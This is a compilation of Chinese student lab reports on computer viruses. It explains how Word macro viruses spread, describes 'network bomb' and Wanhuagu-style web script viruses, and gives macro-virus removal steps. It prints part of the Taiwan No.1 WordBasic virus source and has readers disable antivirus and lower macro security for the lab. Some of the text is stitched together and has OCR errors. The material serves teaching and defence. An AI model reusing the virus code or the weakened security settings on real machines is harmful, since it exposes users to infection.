宏病毒传播带来很多便利。特别是Intemet网络的普及．Email的大量应用更为Word 宏病毒传播铺平道路。根据国外保守的统计，宏病毒的感染率高达40％以上，即在现实生活中每发现100个病毒，其中就40多个宏病毒，而目前国际上普通病毒种类已达12000多种。 宏病毒的产生，是利用了一些数据处理系统内置宏命令编程语言的特性而形成的。这些数据处理系统内置宏编程语言的存在使得宏病毒有机可乘，病毒可以把特定的宏命令代码附加在指定文件上，通过文件的打开或关闭来获取控制权，实现宏命令在不同文件之间的共享和传递，从而在未经使用者许可的情况下获取控制权，达到传染目的。目前在可被宏病毒感染的文件中，以W0rd，Excel居多。Word宏病毒与Excel宏病毒的特性较为相似，因此以word宏病毒为例，说明宏病毒的作用，传染以及发作的机理和特性。一旦病毒宏侵入woId，它就会替代原有的正常的宏，如FileOpen、FileSave等，并通过这些宏所关联的文件操作功能获取对文件交换的控制。当某项功能被调用时，相应的病毒宏就会篡夺控制权，实施病毒所定义的非法操作，包括传染操作、表现操作以及破坏操作等。宏病毒在感染一个文档时，首先要把文档转换成模板格式，然后把所有病毒宏f 包括自动宏)复制到该文档中。被转换成模板格式后的染毒文件无法转存为任何其他格式。含有自动宏的宏病毒染毒文档，当被其他计算机的woId系统打开时，便会自动感染该计算机。例如，如果病毒捕获并修改了FileOpen．那么，它将感染每一个被打开的Word文件。目前，几乎所有已知的宏病毒都沿用了相同的作用机理，即如果Word 系统在读取一个染毒文件时遭受感染．则其后所有新创建的DOC文件都会被感染。 以往病毒是以二进制的计算机机器码形式出现，而宏病毒则是以人们容易阅读的源代码宏言word Basic形式出现，所以编写和修改宏病毒比以往病毒更容易。目前，世界上的宏病毒原型己有几十种，其变种与日俱增．追究其原因还是Word

计算机病毒实验

计算机病毒实验报告

一、实验目的 （1）掌握常见几种病毒的基本原理 （2）掌握清除病毒的方法 （3）学会使用几种常见病毒进行基本编程的技术 二、实验内容 分别用PE病毒，欢乐时光脚本病毒，梅丽莎宏病毒，台湾宏病毒，万花谷脚本病毒，网络炸弹脚本病毒进行感染和病毒清除实验。 三、实验环境 信息安全综合实验系统 操作系统：WINDOWS2000 JDK版本：Java Standard Edition 1.4.0以上 数据库：Mysql 开发语言：JSP Web服务器:Tomacat Office版本:MS office2000/2003 四、实验结果 1、网络炸弹 （1）实验原理 网页恶意代码确切的讲是一段黑客破坏代码程序，它内嵌在网页中，当用户在不知情的情况下打开含有病毒的网页时，病毒就会发作。这种病毒代码镶嵌技术的原理并不复杂，所以会被很多怀不良企图者利用，使非常多的用户遭受损失。 “网络炸弹”是一种网页恶意代码，可以无限次得弹出固定窗口来达到侵占客户机系统资源，最终导致客户端死机的结果。 （2）结果演示 1、修改IE的安全级别

2、修改注册表的安全设置 图2 修改IE安全设置

3、网络炸弹感染 图3 网络炸弹感染4、网络炸弹源码 图4 网络炸弹源码

2、万花谷脚本病毒 （1）实验原理 JS.On888 脚本病毒(俗称“万花谷”病毒)实际上是一个含有恶意脚本代码的网页文件，其脚本代码具有恶意破坏能力，但并不含有传播性。实验病毒为模仿它所写成的类“万花谷”病毒,减轻了病毒危害。 （2）结果演示 1、修改IE的安全级别 2、万花谷病毒感染 图5 万花谷病毒感染-1

计算机病毒原理-台湾1号病毒实验报告

计算机病毒 实验报告 姓名： 学号: 老师： 日期：

一. 实验目的 台湾1号病毒是一种破坏力较大的宏病毒！Word宏是指能组织到一起为独立命令使用的一系列Word指令，它能使日常工作变得容易。本实验演示了宏的编写，通过台湾1号病毒示例，说明宏的原理及其安全漏洞和缺陷，理解宏病毒的作用机制，从而加强对宏病毒的认识，提高防范意识。 二. 实验内容 1. macro virus中的内容 2.计算机病毒篇 ---->计算机宏病毒 三. 实验环境 1. macro virus 硬件设备：局域网，终端PC机。 系统软件：Windows系列操作系统 支撑软件：Word 2003 软件设置：关闭杀毒软；打开Word 2003，在工具→宏→安全性中，将安全级别设置为低，在可靠发行商选项卡中，选择信任任何所有安装的加载项和模板，选择信任visual basic项目的访问. 实验环境配置如下图所示：

受感染终端 受感染Word 文档 被感染终端 2.计算机宏病毒 硬件设备：部署 WIN2003 系统的PC 机一台 软件工具：Office word2007

四．实验步骤及截图 台湾1号病毒代码 Taiwan No.1 病毒原始码 Dim Shared nm(4) Sub MAIN DisableInput 1 If Day(Now()) = 13 Then try: On Error Goto 0 On Error Goto try test = - 1 con = 1 tog$ = "" i = 0 While test = - 1 For i = 0 To 4 nm(i) = Int(Rnd() * 10000) con = (con * nm(i)) If i = 4 Then tog$ = tog$ + Str$(nm(4)) + " =?" Goto beg End If tog$ = tog$ + Str$(nm(i)) + " *" Next i rem 随机选出四个千位数, 以便等一下的游戏

清除宏病毒方法

清除宏病毒方法 一、验证是否感染了宏病毒？ 打开需要检查的文档，单击“文件”菜单栏，选择“另存为”命令，如果对话框中的保存类型固定为“文档模板”，则表示这个文件已经感染了宏病毒。 二、清除宏病毒的方法 1、 OFFICE2003方法：打开文档，工具――宏――宏（或者使用组合键“Alt ＋F8”,如OFFICE版本不同找不到选项，可以使用此组合键）调出宏对话框，如果在弹出的对话框中有已经记录的宏的话，那就极有可能是宏病毒，删除所有的宏就可以了。

比较复杂的宏病毒会将宏对话框屏蔽掉，这时就需要采用其他方法了。Word 环境中的宏病毒一般是存放在Microsoft Office目录下Templates子目录中的Normal.dot文件中，这时需要重新启动计算机，找到这个文件，并把它删除，再运行Word就可以了。但是有些宏病毒“知道”用户会找到No rmal.dot 并删除掉，所以它会在硬盘的多个目录中放上同样的No rmal.dot，如果只删除Templates下的一个，Word会按照Windows缺省的搜索路径进行搜索，这样会加载其他有毒的Normal.dot，并把删除掉的再重新恢复这时，只要使用Windows中查找文件的方法把硬盘中所有的Normal.dot全部删除就可以了。 2、设置宏安全性。Office2003方法，打开文档－工具－选项－安全性－宏 安全性－安全级。 Office20010方法，打开文档－文件－选项－信任中心－信任中心设置－宏设置－禁用所有宏，并且不通知。

3、使用宏病毒专杀工具全盘查杀。 可到https://www.360docs.net/doc/a8833481.html,/html/5254.html下载专杀工具。 安装“宏病毒专杀工具”，按照步骤一步步安装即可，安装完成后，进行全盘扫描查杀。